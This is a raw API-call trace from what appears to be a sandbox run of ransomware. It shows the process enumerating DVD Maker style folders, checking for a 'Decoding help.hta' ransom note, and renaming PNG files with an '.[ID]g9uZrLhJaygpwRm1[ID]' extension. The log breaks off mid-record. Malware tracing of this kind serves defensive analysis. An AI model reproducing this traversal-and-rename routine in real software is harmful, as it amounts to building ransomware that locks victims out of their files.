lstrcmpW (lpString1=".", lpString2="Performance") returned -1 [0053.231] lstrcmpW (lpString1="..", lpString2="Performance") returned -1 [0053.231] lstrcmpiW (lpString1="windows", lpString2="Performance") returned 1 [0053.235] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.235] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.235] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Performance" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" [0053.235] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\*.*" [0053.235] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0053.235] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a6e8180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0053.236] CloseHandle (hObject=0x3e0) returned 1 [0053.236] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets", cAlternateFileName="")) returned 1 [0053.236] lstrcmpW (lpString1=".", lpString2="Pets") returned -1 [0053.236] lstrcmpW (lpString1="..", lpString2="Pets") returned -1 [0053.236] lstrcmpiW (lpString1="windows", lpString2="Pets") returned 1 [0053.238] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.239] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.239] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Pets" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" [0053.239] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*.*" [0053.239] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0053.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7001e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3e0 [0053.840] CloseHandle (hObject=0x3e0) returned 1 [0053.840] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ee00a15, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x4ee00a15, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x14fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="photoedge_buttongraphic.png", cAlternateFileName="")) returned 1 [0053.840] lstrcpyW (in: lpString1=0x2a7883b0, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.840] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.840] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.840] lstrcmpiW (lpString1="Decoding help.hta", lpString2="photoedge_buttongraphic.png") returned -1 [0053.840] lstrlenW (lpString="photoedge_buttongraphic.png") returned 27 [0053.840] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.840] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.840] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.840] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="photoedge_buttongraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" [0053.840] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" [0053.840] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.841] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8601df, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8601df, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1274, dwReserved0=0x0, dwReserved1=0x0, cFileName="photoedge_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0053.841] lstrcpyW (in: lpString1=0x2a7883b0, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.841] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.841] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.841] lstrcmpiW (lpString1="Decoding help.hta", lpString2="photoedge_selectionsubpicture.png") returned -1 [0053.841] lstrlenW (lpString="photoedge_selectionsubpicture.png") returned 33 [0053.841] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0053.841] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.841] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.841] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="photoedge_selectionsubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" [0053.841] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" [0053.841] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.841] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e88633c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e88633c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1266, dwReserved0=0x0, dwReserved1=0x0, cFileName="photoedge_videoinset.png", cAlternateFileName="")) returned 1 [0053.841] lstrcpyW (in: lpString1=0x2a7883b0, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.841] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.841] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.841] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.841] lstrcmpiW (lpString1="Decoding help.hta", lpString2="photoedge_videoinset.png") returned -1 [0053.842] lstrlenW (lpString="photoedge_videoinset.png") returned 24 [0053.842] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.842] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.842] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="photoedge_videoinset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" [0053.842] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" [0053.842] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.842] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efaa4ac, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efaa4ac, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee00a15, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x59b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Postage_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0053.842] lstrcpyW (in: lpString1=0x2a7883b0, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.842] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.842] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.842] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.842] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Postage_ButtonGraphic.png") returned -1 [0053.842] lstrlenW (lpString="Postage_ButtonGraphic.png") returned 25 [0053.842] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.842] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.842] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Postage_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" [0053.842] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" [0053.842] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0055.322] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efd0609, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efd0609, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x160f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Postage_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0055.322] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0055.322] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0055.322] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0055.322] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0055.323] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Postage_SelectionSubpicture.png") returned -1 [0055.323] lstrlenW (lpString="Postage_SelectionSubpicture.png") returned 31 [0055.323] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0055.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0055.323] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0055.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Postage_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" [0055.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" [0055.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0055.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0055.323] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efd0609, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efd0609, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Postage_VideoInset.png", cAlternateFileName="")) returned 1 [0055.323] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0055.323] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0055.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0055.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0055.323] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Postage_VideoInset.png") returned -1 [0055.323] lstrlenW (lpString="Postage_VideoInset.png") returned 22 [0055.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0055.323] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0055.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Postage_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" [0055.324] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" [0055.324] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" [0055.324] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0055.324] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, 